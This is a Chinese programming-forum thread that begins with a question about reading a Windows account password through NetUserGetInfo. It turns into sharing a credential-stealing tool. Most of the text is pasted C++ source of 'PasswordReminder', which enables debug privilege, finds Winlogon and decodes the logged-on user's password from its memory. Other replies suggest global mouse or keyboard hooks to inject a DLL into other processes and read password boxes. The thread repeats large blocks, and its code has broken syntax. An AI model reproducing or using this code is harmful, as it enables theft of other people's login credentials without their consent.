PUSER_INFO_2 p;
DWORD r;
r = NetUserGetInfo(NULL,L"Administrator",2,(LPBYTE *)&p);
Caption = p->usri2_password;
//结果密码为空,为何?用什么方法可获取指定用户的密码。
30 个解决方案
#1
NetUserGetInfo函数的说明中指出,不能获得密码,否则也太不安全了。
#2
win2000的密码是不可逆的。
#3
MSDN 中说用NetUserGetInfo是不能获得密码的
#4
这个函数本来就不能得到密码。实际上也没有API可以得到。找个程序,自己猜吧。
有个程序可以获得当前登陆用户(需要是管理员身份)的密码
http://vip.6to23.com/NowCan1/code/PasswordReminder.zip
有个程序可以获得当前登陆用户(需要是管理员身份)的密码
http://vip.6to23.com/NowCan1/code/PasswordReminder.zip
#5
呵呵,获密码有这么简单Windows还怎么混啊,,
#6
密码是hash后存储的,只能进行验证,不能取出,就是你想办法取出也不是真正的密码。
#7
搞笑!
#8
我也想破解,但是好像不可能吧
#9
这个不知道行不行,没试过
读取当前登陆的用户名和密码(原代码) (转贴)
代码:--------------------------------------------------------------------------------
// PasswordReminder.cpp
//
// This code is licensed under the terms of the GPL (gnu public license).
//
#include <stdafx.h>
#include <tchar.h>
#include <stdio.h>
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
// Undocumented typedef‘s
typedef struct _QUERY_SYSTEM_INFORMATION
{
DWORD GrantedAccess;
DWORD PID;
WORD HandleType;
WORD HandleId;
DWORD Handle;
} QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION;
typedef struct _PROCESS_INFO_HEADER
{
DWORD Count;
DWORD Unk04;
DWORD Unk08;
} PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER;
typedef struct _PROCESS_INFO
{
DWORD LoadAddress;
DWORD Size;
DWORD Unk08;
DWORD Enumerator;
DWORD Unk10;
char Name [0x108];
} PROCESS_INFO, *PPROCESS_INFO;
typedef struct _ENCODED_PASSWORD_INFO
{
DWORD HashByte;
DWORD Unk04;
DWORD Unk08;
DWORD Unk0C;
FILETIME LoggedOn;
DWORD Unk18;
DWORD Unk1C;
DWORD Unk20;
DWORD Unk24;
DWORD Unk28;
UNICODE_STRING EncodedPassword;
} ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO;
typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD);
typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD);
typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID);
typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID);
typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING);
// Private Prototypes
BOOL IsWinNT (void);
BOOL IsWin2K (void);
BOOL AddDebugPrivilege (void);
DWORD FindWinLogon (void);
BOOL LocatePasswordPageWinNT (DWORD, PDWORD);
BOOL LocatePasswordPageWin2K (DWORD, PDWORD);
void DisplayPasswordWinNT (CString &Username,CString &Pwd);
void DisplayPasswordWin2K (CString &Username,CString &Pwd);
// Global Variables
PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation;
PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer;
PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation;
PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer;
PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString;
DWORD PasswordLength = 0;
PVOID RealPasswordP = NULL;
PVOID PasswordP = NULL;
DWORD HashByte = 0;
wchar_t UserName [0x400];
wchar_t UserDomain [0x400];
读取当前登陆的用户名和密码(原代码) (转贴)
代码:--------------------------------------------------------------------------------
// PasswordReminder.cpp
//
// This code is licensed under the terms of the GPL (gnu public license).
//
#include <stdafx.h>
#include <tchar.h>
#include <stdio.h>
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
// Undocumented typedef‘s
typedef struct _QUERY_SYSTEM_INFORMATION
{
DWORD GrantedAccess;
DWORD PID;
WORD HandleType;
WORD HandleId;
DWORD Handle;
} QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION;
typedef struct _PROCESS_INFO_HEADER
{
DWORD Count;
DWORD Unk04;
DWORD Unk08;
} PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER;
typedef struct _PROCESS_INFO
{
DWORD LoadAddress;
DWORD Size;
DWORD Unk08;
DWORD Enumerator;
DWORD Unk10;
char Name [0x108];
} PROCESS_INFO, *PPROCESS_INFO;
typedef struct _ENCODED_PASSWORD_INFO
{
DWORD HashByte;
DWORD Unk04;
DWORD Unk08;
DWORD Unk0C;
FILETIME LoggedOn;
DWORD Unk18;
DWORD Unk1C;
DWORD Unk20;
DWORD Unk24;
DWORD Unk28;
UNICODE_STRING EncodedPassword;
} ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO;
typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD);
typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD);
typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID);
typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID);
typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING);
// Private Prototypes
BOOL IsWinNT (void);
BOOL IsWin2K (void);
BOOL AddDebugPrivilege (void);
DWORD FindWinLogon (void);
BOOL LocatePasswordPageWinNT (DWORD, PDWORD);
BOOL LocatePasswordPageWin2K (DWORD, PDWORD);
void DisplayPasswordWinNT (CString &Username,CString &Pwd);
void DisplayPasswordWin2K (CString &Username,CString &Pwd);
// Global Variables
PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation;
PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer;
PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation;
PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer;
PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString;
DWORD PasswordLength = 0;
PVOID RealPasswordP = NULL;
PVOID PasswordP = NULL;
DWORD HashByte = 0;
wchar_t UserName [0x400];
wchar_t UserDomain [0x400];
#10
int __cdecl GetPasswordNT2K(CString &Username,CString &Pwd)
{
if ((!IsWinNT ())
&&
(!IsWin2K ()))
{
return (0);
}
// Add debug privilege to PasswordReminder -
// this is needed for the search for Winlogon.
if (!AddDebugPrivilege ())
{
return (0);
}
HINSTANCE hNtDll =
LoadLibrary
("NTDLL.DLL";
pfnNtQuerySystemInformation =
(PFNNTQUERYSYSTEMINFORMATION) GetProcAddress
(hNtDll,
"NtQuerySystemInformation";
pfnRtlCreateQueryDebugBuffer =
(PFNRTLCREATEQUERYDEBUGBUFFER) GetProcAddress
(hNtDll,
"RtlCreateQueryDebugBuffer";
pfnRtlQueryProcessDebugInformation =
(PFNRTLQUERYPROCESSDEBUGINFORMATION) GetProcAddress
(hNtDll,
"RtlQueryProcessDebugInformation";
pfnRtlDestroyQueryDebugBuffer =
(PFNRTLDESTROYQUERYDEBUGBUFFER) GetProcAddress
(hNtDll,
"RtlDestroyQueryDebugBuffer";
pfnRtlRunDecodeUnicodeString =
(PFNTRTLRUNDECODEUNICODESTRING) GetProcAddress
(hNtDll,
"RtlRunDecodeUnicodeString";
// Locate WinLogon‘s PID - need debug privilege and admin rights.
DWORD WinLogonPID =
FindWinLogon ();
if (WinLogonPID == 0)
{
/* printf
("PasswordReminder is unable to find WinLogon or you are using NWGINA.DLL.\n";
printf
("PasswordReminder is unable to find the password in memory.\n";
*/ FreeLibrary
(hNtDll);
return (0);
}
/* printf
("The WinLogon process id is %d (0x%8.8lx).\n",
WinLogonPID,
WinLogonPID);
*/
// Set values to check memory block against.
memset
(UserName,
0,
sizeof (UserName));
memset
(UserDomain,
0,
sizeof (UserDomain));
GetEnvironmentVariableW
(L"USERNAME",
UserName,
0x400);
GetEnvironmentVariableW
(L"USERDOMAIN",
UserDomain,
0x400);
#11
// Locate the block of memory containing
// the password in WinLogon‘s memory space.
BOOL FoundPasswordPage = FALSE;
if (IsWin2K ())
FoundPasswordPage =
LocatePasswordPageWin2K
(WinLogonPID,
&PasswordLength);
else
FoundPasswordPage =
LocatePasswordPageWinNT
(WinLogonPID,
&PasswordLength);
if (FoundPasswordPage)
{
if (PasswordLength == 0)
{
Username.Format
("%S/%S",
UserDomain,
UserName);
Pwd="There is no password.";
}
else
{
/*printf
("The encoded password is found at 0x%8.8lx and has a length of %d.\n",
RealPasswordP,
PasswordLength);
*/ // Decode the password string.
if (IsWin2K ())
DisplayPasswordWin2K (Username,Pwd);
else
DisplayPasswordWinNT (Username,Pwd);
}
}
/*else
printf
("PasswordReminder is unable to find the password in memory.\n";
*/
FreeLibrary
(hNtDll);
return (1);
} // main
BOOL
IsWinNT
(void)
{
OSVERSIONINFO OSVersionInfo;
OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
if (GetVersionEx
(&OSVersionInfo))
return (OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT);
else
return (FALSE);
} // IsWinNT
BOOL
IsWin2K
(void)
{
OSVERSIONINFO OSVersionInfo;
OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
if (GetVersionEx
(&OSVersionInfo))
return ((OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT)
&&
(OSVersionInfo.dwMajorVersion == 5));
else
return (FALSE);
} // IsWin2K
BOOL
AddDebugPrivilege
(void)
{
HANDLE Token;
TOKEN_PRIVILEGES TokenPrivileges, PreviousState;
DWORD ReturnLength = 0;
if (OpenProcessToken
(GetCurrentProcess (),
TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES,
&Token))
if (LookupPrivilegevalue
(NULL,
"SeDebugPrivilege",
&TokenPrivileges.Privileges[0].Luid))
{
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
return
(AdjustTokenPrivileges
(Token,
FALSE,
&TokenPrivileges,
sizeof (TOKEN_PRIVILEGES),
&PreviousState,
&ReturnLength));
}
return (FALSE);
} // AddDebugPrivilege
// Note that the following code eliminates the need
// for PSAPI.DLL as part of the executable.
DWORD
FindWinLogon
(void)
{
#define INITIAL_ALLOCATION 0x100
DWORD rc = 0;
DWORD SizeNeeded = 0;
PVOID InfoP =
HeapAlloc
(GetProcessHeap (),
HEAP_ZERO_MEMORY,
INITIAL_ALLOCATION);
// Find how much memory is required.
pfnNtQuerySystemInformation
(0x10,
InfoP,
INITIAL_ALLOCATION,
&SizeNeeded);
HeapFree
(GetProcessHeap (),
0,
InfoP);
// Now, allocate the proper amount of memory.
InfoP =
HeapAlloc
(GetProcessHeap (),
HEAP_ZERO_MEMORY,
SizeNeeded);
DWORD SizeWritten = SizeNeeded;
if (pfnNtQuerySystemInformation
(0x10,
InfoP,
SizeNeeded,
&SizeWritten))
{
HeapFree
(GetProcessHeap (),
0,
InfoP);
return (0);
}
DWORD NumHandles = SizeWritten / sizeof (QUERY_SYSTEM_INFORMATION);
if (NumHandles == 0)
{
HeapFree
(GetProcessHeap (),
0,
InfoP);
return (0);
}
PQUERY_SYSTEM_INFORMATION QuerySystemInformationP =
(PQUERY_SYSTEM_INFORMATION) InfoP;
DWORD i;
for (i = 1; i <= NumHandles; i++)
{
// "5" is the value of a kernel object type process.
if (QuerySystemInformationP->HandleType == 5)
{
PVOID DebugBufferP =
pfnRtlCreateQueryDebugBuffer
(0,
0);
if (pfnRtlQueryProcessDebugInformation
(QuerySystemInformationP->PID,
1,
DebugBufferP) == 0)
{
PPROCESS_INFO_HEADER ProcessInfoHeaderP =
(PPROCESS_INFO_HEADER) ((DWORD) DebugBufferP + 0x60);
DWORD Count =
ProcessInfoHeaderP->Count;
PPROCESS_INFO ProcessInfoP =
(PPROCESS_INFO) ((DWORD) ProcessInfoHeaderP + sizeof (PROCESS_INFO_HEADER));
if (strstr (_strupr (ProcessInfoP->Name), "WINLOGON" != 0)
{
DWORD i;
DWORD dw = (DWORD) ProcessInfoP;
for (i = 0; i < Count; i++)
{
dw += sizeof (PROCESS_INFO);
ProcessInfoP = (PPROCESS_INFO) dw;
if (strstr (_strupr (ProcessInfoP->Name), "NWGINA" != 0)
return (0);
if (strstr (_strupr (ProcessInfoP->Name), "MSGINA" == 0)
rc =
QuerySystemInformationP->PID;
}
if (DebugBufferP)
pfnRtlDestroyQueryDebugBuffer
(DebugBufferP);
HeapFree
(GetProcessHeap (),
0,
InfoP);
return (rc);
}
}
if (DebugBufferP)
pfnRtlDestroyQueryDebugBuffer
(DebugBufferP);
}
DWORD dw = (DWORD) QuerySystemInformationP;
dw += sizeof (QUERY_SYSTEM_INFORMATION);
QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION) dw;
}
HeapFree
(GetProcessHeap (),
0,
InfoP);
return (rc);
} // FindWinLogon
#12
用全局的鼠标或键盘钩子
#13
在调用这个函数的地方和要取的密码框在一个进程里,那么是可以成功的。
进入目标进程后再调用这个函数。
用全局鼠标钩子。用鼠标钩子能取密码的地方肯定是可见的窗口,所以肯定能接收鼠标消息,这样,只要鼠标从它上面一过,我的DLL就进入了目标进程。然后,在在鼠标钩子的钩子函数中,可以很方便的得到鼠标位置,而且这个钩子函数是在DLL里,这时也已经进入了目标进程,所以这时调用SendMessage是可以取出密码的。
进入目标进程后再调用这个函数。
用全局鼠标钩子。用鼠标钩子能取密码的地方肯定是可见的窗口,所以肯定能接收鼠标消息,这样,只要鼠标从它上面一过,我的DLL就进入了目标进程。然后,在在鼠标钩子的钩子函数中,可以很方便的得到鼠标位置,而且这个钩子函数是在DLL里,这时也已经进入了目标进程,所以这时调用SendMessage是可以取出密码的。
#14
我觉得做出来后就可以打电话给比尔了!
#15
侮辱比尔的重任就交给兄弟们了!哈哈哈哈
#16
PasswordReminder可以显示当前登录用户的密码。
我编译过,测试通过,可以得到密码的。
我编译过,测试通过,可以得到密码的。
#17
可以得到密码。我只有exe文件没有源代码,我不知道那个程序怎么编的》
#18
PasswordReminder:
WINLOGON.exe肯定把我们登陆的用户名和密码加密后 放在他的进程空间的某一个地方。
PasswordReminder是通过调用一些未文档化的Native api实现的
WINLOGON.exe肯定把我们登陆的用户名和密码加密后 放在他的进程空间的某一个地方。
PasswordReminder是通过调用一些未文档化的Native api实现的
#19
NowCan 的网站上有
#20
SP4 的都可以的
#21
看看。
#22
PasswordReminder的确可以获得密码,就是http://expert.csdn.net/Expert/topic/2038/2038889.xml?temp=.5845606帖子的内容,不过我试验了,当使用了Windows2000的Run As功能以后,就不可以获得密码,错误是在内存中没有找到密码,不知道原因,看来这个程序必须是以登录用户身份运行的程序才可以获取密码,遇到“熊猫卫士”等网络版的杀毒软件,估计就不灵了。
#23
答案是肯定的,我有取得密码的cb版本的程序,自己用上面的那个程序更改的,如果谁要可以给我发邮件,zihan06@yeah.net
#24
zihan(子寒) 可不可以给我发一份源代码?
vick@95999.net
vick@95999.net
#25
已经发出了,请接收!
#26
要破解密码很难,但瑞士的研究着却可以在12秒内解除Win2000的密码
#27
楼上的消息好像不准确吧,我(改)的那个程序可以在1秒钟之类实现哦.不过不是破解,而是取出
如果真的强行破解,应该不可能实现的,如果我的密码足够长的话
如果真的强行破解,应该不可能实现的,如果我的密码足够长的话
#28
子寒,我想要你那个源程序,多谢了!
#29
To zihan(子寒):
它说的是“解除”,而不是“破解”。
也就是说让win2000失去密码保护就可以了。
也就是说只要删掉密码,或改成你指定的另一个密码就行了,
不需要得出目前具体的密码。
我也见过类似的报道,说什么设法破坏SAM就可以了。
它说的是“解除”,而不是“破解”。
也就是说让win2000失去密码保护就可以了。
也就是说只要删掉密码,或改成你指定的另一个密码就行了,
不需要得出目前具体的密码。
我也见过类似的报道,说什么设法破坏SAM就可以了。
#30
我看到程序员杂志上有一篇这样的文章
好象是第八期
好象是第八期
#1
NetUserGetInfo函数的说明中指出,不能获得密码,否则也太不安全了。
#2
win2000的密码是不可逆的。
#3
MSDN 中说用NetUserGetInfo是不能获得密码的
#4
这个函数本来就不能得到密码。实际上也没有API可以得到。找个程序,自己猜吧。
有个程序可以获得当前登陆用户(需要是管理员身份)的密码
http://vip.6to23.com/NowCan1/code/PasswordReminder.zip
有个程序可以获得当前登陆用户(需要是管理员身份)的密码
http://vip.6to23.com/NowCan1/code/PasswordReminder.zip
#5
呵呵,获密码有这么简单Windows还怎么混啊,,
#6
密码是hash后存储的,只能进行验证,不能取出,就是你想办法取出也不是真正的密码。
#7
搞笑!
#8
我也想破解,但是好像不可能吧
#9
这个不知道行不行,没试过
读取当前登陆的用户名和密码(原代码) (转贴)
代码:--------------------------------------------------------------------------------
// PasswordReminder.cpp
//
// This code is licensed under the terms of the GPL (gnu public license).
//
#include <stdafx.h>
#include <tchar.h>
#include <stdio.h>
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
// Undocumented typedef‘s
typedef struct _QUERY_SYSTEM_INFORMATION
{
DWORD GrantedAccess;
DWORD PID;
WORD HandleType;
WORD HandleId;
DWORD Handle;
} QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION;
typedef struct _PROCESS_INFO_HEADER
{
DWORD Count;
DWORD Unk04;
DWORD Unk08;
} PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER;
typedef struct _PROCESS_INFO
{
DWORD LoadAddress;
DWORD Size;
DWORD Unk08;
DWORD Enumerator;
DWORD Unk10;
char Name [0x108];
} PROCESS_INFO, *PPROCESS_INFO;
typedef struct _ENCODED_PASSWORD_INFO
{
DWORD HashByte;
DWORD Unk04;
DWORD Unk08;
DWORD Unk0C;
FILETIME LoggedOn;
DWORD Unk18;
DWORD Unk1C;
DWORD Unk20;
DWORD Unk24;
DWORD Unk28;
UNICODE_STRING EncodedPassword;
} ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO;
typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD);
typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD);
typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID);
typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID);
typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING);
// Private Prototypes
BOOL IsWinNT (void);
BOOL IsWin2K (void);
BOOL AddDebugPrivilege (void);
DWORD FindWinLogon (void);
BOOL LocatePasswordPageWinNT (DWORD, PDWORD);
BOOL LocatePasswordPageWin2K (DWORD, PDWORD);
void DisplayPasswordWinNT (CString &Username,CString &Pwd);
void DisplayPasswordWin2K (CString &Username,CString &Pwd);
// Global Variables
PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation;
PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer;
PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation;
PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer;
PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString;
DWORD PasswordLength = 0;
PVOID RealPasswordP = NULL;
PVOID PasswordP = NULL;
DWORD HashByte = 0;
wchar_t UserName [0x400];
wchar_t UserDomain [0x400];
读取当前登陆的用户名和密码(原代码) (转贴)
代码:--------------------------------------------------------------------------------
// PasswordReminder.cpp
//
// This code is licensed under the terms of the GPL (gnu public license).
//
#include <stdafx.h>
#include <tchar.h>
#include <stdio.h>
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
// Undocumented typedef‘s
typedef struct _QUERY_SYSTEM_INFORMATION
{
DWORD GrantedAccess;
DWORD PID;
WORD HandleType;
WORD HandleId;
DWORD Handle;
} QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION;
typedef struct _PROCESS_INFO_HEADER
{
DWORD Count;
DWORD Unk04;
DWORD Unk08;
} PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER;
typedef struct _PROCESS_INFO
{
DWORD LoadAddress;
DWORD Size;
DWORD Unk08;
DWORD Enumerator;
DWORD Unk10;
char Name [0x108];
} PROCESS_INFO, *PPROCESS_INFO;
typedef struct _ENCODED_PASSWORD_INFO
{
DWORD HashByte;
DWORD Unk04;
DWORD Unk08;
DWORD Unk0C;
FILETIME LoggedOn;
DWORD Unk18;
DWORD Unk1C;
DWORD Unk20;
DWORD Unk24;
DWORD Unk28;
UNICODE_STRING EncodedPassword;
} ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO;
typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD);
typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD);
typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID);
typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID);
typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING);
// Private Prototypes
BOOL IsWinNT (void);
BOOL IsWin2K (void);
BOOL AddDebugPrivilege (void);
DWORD FindWinLogon (void);
BOOL LocatePasswordPageWinNT (DWORD, PDWORD);
BOOL LocatePasswordPageWin2K (DWORD, PDWORD);
void DisplayPasswordWinNT (CString &Username,CString &Pwd);
void DisplayPasswordWin2K (CString &Username,CString &Pwd);
// Global Variables
PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation;
PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer;
PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation;
PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer;
PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString;
DWORD PasswordLength = 0;
PVOID RealPasswordP = NULL;
PVOID PasswordP = NULL;
DWORD HashByte = 0;
wchar_t UserName [0x400];
wchar_t UserDomain [0x400];
#10
int __cdecl GetPasswordNT2K(CString &Username,CString &Pwd)
{
if ((!IsWinNT ())
&&
(!IsWin2K ()))
{
return (0);
}
// Add debug privilege to PasswordReminder -
// this is needed for the search for Winlogon.
if (!AddDebugPrivilege ())
{
return (0);
}
HINSTANCE hNtDll =
LoadLibrary
("NTDLL.DLL";
pfnNtQuerySystemInformation =
(PFNNTQUERYSYSTEMINFORMATION) GetProcAddress
(hNtDll,
"NtQuerySystemInformation";
pfnRtlCreateQueryDebugBuffer =
(PFNRTLCREATEQUERYDEBUGBUFFER) GetProcAddress
(hNtDll,
"RtlCreateQueryDebugBuffer";
pfnRtlQueryProcessDebugInformation =
(PFNRTLQUERYPROCESSDEBUGINFORMATION) GetProcAddress
(hNtDll,
"RtlQueryProcessDebugInformation";
pfnRtlDestroyQueryDebugBuffer =
(PFNRTLDESTROYQUERYDEBUGBUFFER) GetProcAddress
(hNtDll,
"RtlDestroyQueryDebugBuffer";
pfnRtlRunDecodeUnicodeString =
(PFNTRTLRUNDECODEUNICODESTRING) GetProcAddress
(hNtDll,
"RtlRunDecodeUnicodeString";
// Locate WinLogon‘s PID - need debug privilege and admin rights.
DWORD WinLogonPID =
FindWinLogon ();
if (WinLogonPID == 0)
{
/* printf
("PasswordReminder is unable to find WinLogon or you are using NWGINA.DLL.\n";
printf
("PasswordReminder is unable to find the password in memory.\n";
*/ FreeLibrary
(hNtDll);
return (0);
}
/* printf
("The WinLogon process id is %d (0x%8.8lx).\n",
WinLogonPID,
WinLogonPID);
*/
// Set values to check memory block against.
memset
(UserName,
0,
sizeof (UserName));
memset
(UserDomain,
0,
sizeof (UserDomain));
GetEnvironmentVariableW
(L"USERNAME",
UserName,
0x400);
GetEnvironmentVariableW
(L"USERDOMAIN",
UserDomain,
0x400);
#11
// Locate the block of memory containing
// the password in WinLogon‘s memory space.
BOOL FoundPasswordPage = FALSE;
if (IsWin2K ())
FoundPasswordPage =
LocatePasswordPageWin2K
(WinLogonPID,
&PasswordLength);
else
FoundPasswordPage =
LocatePasswordPageWinNT
(WinLogonPID,
&PasswordLength);
if (FoundPasswordPage)
{
if (PasswordLength == 0)
{
Username.Format
("%S/%S",
UserDomain,
UserName);
Pwd="There is no password.";
}
else
{
/*printf
("The encoded password is found at 0x%8.8lx and has a length of %d.\n",
RealPasswordP,
PasswordLength);
*/ // Decode the password string.
if (IsWin2K ())
DisplayPasswordWin2K (Username,Pwd);
else
DisplayPasswordWinNT (Username,Pwd);
}
}
/*else
printf
("PasswordReminder is unable to find the password in memory.\n";
*/
FreeLibrary
(hNtDll);
return (1);
} // main
BOOL
IsWinNT
(void)
{
OSVERSIONINFO OSVersionInfo;
OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
if (GetVersionEx
(&OSVersionInfo))
return (OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT);
else
return (FALSE);
} // IsWinNT
BOOL
IsWin2K
(void)
{
OSVERSIONINFO OSVersionInfo;
OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
if (GetVersionEx
(&OSVersionInfo))
return ((OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT)
&&
(OSVersionInfo.dwMajorVersion == 5));
else
return (FALSE);
} // IsWin2K
BOOL
AddDebugPrivilege
(void)
{
HANDLE Token;
TOKEN_PRIVILEGES TokenPrivileges, PreviousState;
DWORD ReturnLength = 0;
if (OpenProcessToken
(GetCurrentProcess (),
TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES,
&Token))
if (LookupPrivilegevalue
(NULL,
"SeDebugPrivilege",
&TokenPrivileges.Privileges[0].Luid))
{
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
return
(AdjustTokenPrivileges
(Token,
FALSE,
&TokenPrivileges,
sizeof (TOKEN_PRIVILEGES),
&PreviousState,
&ReturnLength));
}
return (FALSE);
} // AddDebugPrivilege
// Note that the following code eliminates the need
// for PSAPI.DLL as part of the executable.
DWORD
FindWinLogon
(void)
{
#define INITIAL_ALLOCATION 0x100
DWORD rc = 0;
DWORD SizeNeeded = 0;
PVOID InfoP =
HeapAlloc
(GetProcessHeap (),
HEAP_ZERO_MEMORY,
INITIAL_ALLOCATION);
// Find how much memory is required.
pfnNtQuerySystemInformation
(0x10,
InfoP,
INITIAL_ALLOCATION,
&SizeNeeded);
HeapFree
(GetProcessHeap (),
0,
InfoP);
// Now, allocate the proper amount of memory.
InfoP =
HeapAlloc
(GetProcessHeap (),
HEAP_ZERO_MEMORY,
SizeNeeded);
DWORD SizeWritten = SizeNeeded;
if (pfnNtQuerySystemInformation
(0x10,
InfoP,
SizeNeeded,
&SizeWritten))
{
HeapFree
(GetProcessHeap (),
0,
InfoP);
return (0);
}
DWORD NumHandles = SizeWritten / sizeof (QUERY_SYSTEM_INFORMATION);
if (NumHandles == 0)
{
HeapFree
(GetProcessHeap (),
0,
InfoP);
return (0);
}
PQUERY_SYSTEM_INFORMATION QuerySystemInformationP =
(PQUERY_SYSTEM_INFORMATION) InfoP;
DWORD i;
for (i = 1; i <= NumHandles; i++)
{
// "5" is the value of a kernel object type process.
if (QuerySystemInformationP->HandleType == 5)
{
PVOID DebugBufferP =
pfnRtlCreateQueryDebugBuffer
(0,
0);
if (pfnRtlQueryProcessDebugInformation
(QuerySystemInformationP->PID,
1,
DebugBufferP) == 0)
{
PPROCESS_INFO_HEADER ProcessInfoHeaderP =
(PPROCESS_INFO_HEADER) ((DWORD) DebugBufferP + 0x60);
DWORD Count =
ProcessInfoHeaderP->Count;
PPROCESS_INFO ProcessInfoP =
(PPROCESS_INFO) ((DWORD) ProcessInfoHeaderP + sizeof (PROCESS_INFO_HEADER));
if (strstr (_strupr (ProcessInfoP->Name), "WINLOGON" != 0)
{
DWORD i;
DWORD dw = (DWORD) ProcessInfoP;
for (i = 0; i < Count; i++)
{
dw += sizeof (PROCESS_INFO);
ProcessInfoP = (PPROCESS_INFO) dw;
if (strstr (_strupr (ProcessInfoP->Name), "NWGINA" != 0)
return (0);
if (strstr (_strupr (ProcessInfoP->Name), "MSGINA" == 0)
rc =
QuerySystemInformationP->PID;
}
if (DebugBufferP)
pfnRtlDestroyQueryDebugBuffer
(DebugBufferP);
HeapFree
(GetProcessHeap (),
0,
InfoP);
return (rc);
}
}
if (DebugBufferP)
pfnRtlDestroyQueryDebugBuffer
(DebugBufferP);
}
DWORD dw = (DWORD) QuerySystemInformationP;
dw += sizeof (QUERY_SYSTEM_INFORMATION);
QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION) dw;
}
HeapFree
(GetProcessHeap (),
0,
InfoP);
return (rc);
} // FindWinLogon
#12
用全局的鼠标或键盘钩子
#13
